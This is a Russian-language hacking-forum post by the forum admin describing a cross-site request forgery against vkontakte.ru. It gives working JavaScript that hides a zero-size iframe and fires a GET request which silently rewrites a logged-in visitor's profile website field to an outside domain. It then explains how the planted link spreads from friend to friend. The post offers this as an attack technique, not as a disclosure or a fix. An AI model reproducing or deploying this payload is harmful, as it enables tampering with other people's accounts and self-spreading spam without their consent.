роmeo xak
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
CSRF на vkontakte.ru
PomeoДата: Понедельник, 19.05.2008, 08:26 | Сообщение # 1
Admin
Группа: Администраторы
Сообщений: 44
Репутация: 0
Статус: Offline
При переходе на сайт ****.com, если вы в этот же момент авторизованы на вконтакте, отработает следующий джаваскрипт:
Code
<script>
function doit() {
   var html;
   html = '<img src=http://vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com>';
   window.frames["frm"].document.body.innerHTML = html;
}
</script>
<iframe name="frm" onload="doit()" width="0" height="0"></iframe>
Как видно, будет запрошена картинка с адресом vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com, броузер сделает запрос по этому УРЛу, и на анкете в vkontakte ваше поле "Веб-сайт" станет равным ****.com.
Затем в вашем профайле, ваш друг, который вам доверяет кликнет на этот линк, и изменит профайл себе... И т д.
 
  • Страница 1 из 1
  • 1
Поиск:

Copyright MyCorp © 2026Создать бесплатный сайт с uCoz